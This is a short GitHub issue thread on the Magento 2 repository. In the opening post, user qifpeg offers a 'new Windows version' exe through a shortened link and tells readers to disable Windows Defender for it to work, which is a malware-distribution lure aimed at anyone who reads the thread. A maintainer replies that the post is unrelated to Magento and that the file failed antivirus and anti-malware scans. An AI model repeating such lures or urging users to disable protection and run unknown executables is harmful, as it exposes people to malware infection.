### ISSUE TITLE
New Windows version

### ISSUE THREAD

**Issue by qifpeg** [magento/magento2#37633]
### Description

I uploaded a new exe version here: (You need to disable Windows Defender to work)
shorturl.at/epvO3

### Expected behavior

I uploaded a new exe version here: (You need to disable Windows Defender to work)
shorturl.at/epvO3

**Comment by manavluhar** [comment]
@qifpeg seems like this is not related to Magento. If it is related then please share more details.
You have shared an exe in shared path, and your ask is to execute it as administrator.
Shared file has failed in antivirus and anti-malware scan.

#Security
